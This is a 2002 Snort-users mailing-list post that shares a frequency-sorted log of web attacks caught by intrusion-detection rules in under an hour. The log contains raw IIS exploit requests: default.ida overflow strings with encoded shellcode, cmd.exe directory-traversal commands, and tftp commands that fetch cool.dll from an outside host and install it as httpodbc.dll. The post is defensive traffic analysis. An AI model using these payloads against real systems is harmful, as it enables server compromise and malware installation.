[Snort-users] Re-affermentain, Opps, I mean re-affirmation of the morons on the net

Phil Wood cpw at ...440...
Sat Feb 9 19:33:02 EST 2002


56 minutes of snort web rules alerts starting Sat Feb  9 18:52:57 MST.
The leading number is frequency. (sort file | uniq -c | sort -rn).
Check out the moron that is going to pull down cool.dll.
(No, this was not captured on my home machine.)

   6244	GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
   4999	GET /scripts/..%c../winnt/system32/cmd.exe?/c+dir dir HTTP/1.0
   2514	GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir r HTTP/1.0
   1303	GET /scripts/root.exe?/c+dir HTTP/1.0
   1290	GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
   1286	GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
   1279	GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir c+dir HTTP/1.0
   1268	GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir c+dir HTTP/1.0
   1259	GET /msadc/..%5c../..%5c../..%5c/..55../..c1../../.../winnt/system32/cmd.exe?/c+dir 32/cmd.exe?/c+dir HTTP/1.0
   1237	GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir dir HTTP/1.0
   1233	GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir c+dir HTTP/1.0
   1228	GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir r HTTP/1.0
     40	GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0
      4	GET /scripts/..%c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll e:\httpodbc.dll \httpodbc.dll HTTP/1.0
      4	GET /scripts/..%c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll d:\httpodbc.dll \httpodbc.dll HTTP/1.0
      4	GET /scripts/..%c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll c:\httpodbc.dll \httpodbc.dll HTTP/1.0
      2	GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll e:\httpodbc.dll ttpodbc.dll HTTP/1.0
      2	GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll d:\httpodbc.dll ttpodbc.dll HTTP/1.0
      2	GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll c:\httpodbc.dll ttpodbc.dll HTTP/1.0
      2	GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0
      1	GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll e:\httpodbc.dll e:\httpodbc.dll HTTP/1.0
      1	GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll d:\httpodbc.dll d:\httpodbc.dll HTTP/1.0
      1	GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll c:\httpodbc.dll c:\httpodbc.dll HTTP/1.0
      1	GET /scripts/root.exe?/c+tftp -i 172.16.102.254 GET cool.dll httpodbc.dll podbc.dll HTTP/1.0
      1	GET /scripts/debug/HM_ScriptDOM.js HTTP/1.1
      1	GET /scripts/debug/HM_ArraysSiteMapLab_sub.js HTTP/1.1
      1	GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll e:\httpodbc.dll \httpodbc.dll HTTP/1.0
      1	GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll e:\httpodbc.dll e:\httpodbc.dll HTTP/1.0
      1	GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll d:\httpodbc.dll \httpodbc.dll HTTP/1.0
      1	GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll d:\httpodbc.dll d:\httpodbc.dll HTTP/1.0
      1	GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll c:\httpodbc.dll \httpodbc.dll HTTP/1.0
      1	GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll c:\httpodbc.dll c:\httpodbc.dll HTTP/1.0
      1	GET /scripts/..%2f../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll e:\httpodbc.dll ttpodbc.dll HTTP/1.0
      1	GET /scripts/..%2f../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll d:\httpodbc.dll ttpodbc.dll HTTP/1.0
      1	GET /scripts/..%2f../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll c:\httpodbc.dll ttpodbc.dll HTTP/1.0
      1	GET /msadc/..%5c../..%5c../..%5c/..55../..c1../../.../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll e:\httpodbc.dll 0cool.dll%20e:\httpodbc.dll HTTP/1.0
      1	GET /msadc/..%5c../..%5c../..%5c/..55../..c1../../.../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll d:\httpodbc.dll 0cool.dll%20d:\httpodbc.dll HTTP/1.0
      1	GET /msadc/..%5c../..%5c../..%5c/..55../..c1../../.../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll c:\httpodbc.dll 0cool.dll%20c:\httpodbc.dll HTTP/1.0
      1	GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll e:\httpodbc.dll e:\httpodbc.dll HTTP/1.0
      1	GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll d:\httpodbc.dll d:\httpodbc.dll HTTP/1.0
      1	GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll c:\httpodbc.dll c:\httpodbc.dll HTTP/1.0
      1	GET /intranet/pitchang_combined/1day/1997-148.html HTTP/1.0
      1	GET /d/winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll e:\httpodbc.dll podbc.dll HTTP/1.0
      1	GET /d/winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll d:\httpodbc.dll podbc.dll HTTP/1.0
      1	GET /d/winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll c:\httpodbc.dll podbc.dll HTTP/1.0
      1	GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
      1	GET /default.ida?
      1	GET /c/winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll e:\httpodbc.dll podbc.dll HTTP/1.0
      1	GET /c/winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll d:\httpodbc.dll podbc.dll HTTP/1.0
      1	GET /c/winnt/system32/cmd.exe?/c+tftp -i 172.16.102.254 GET cool.dll c:\httpodbc.dll podbc.dll HTTP/1.0
      1	GET /c

Now for another beer.




More information about the Snort-users mailing list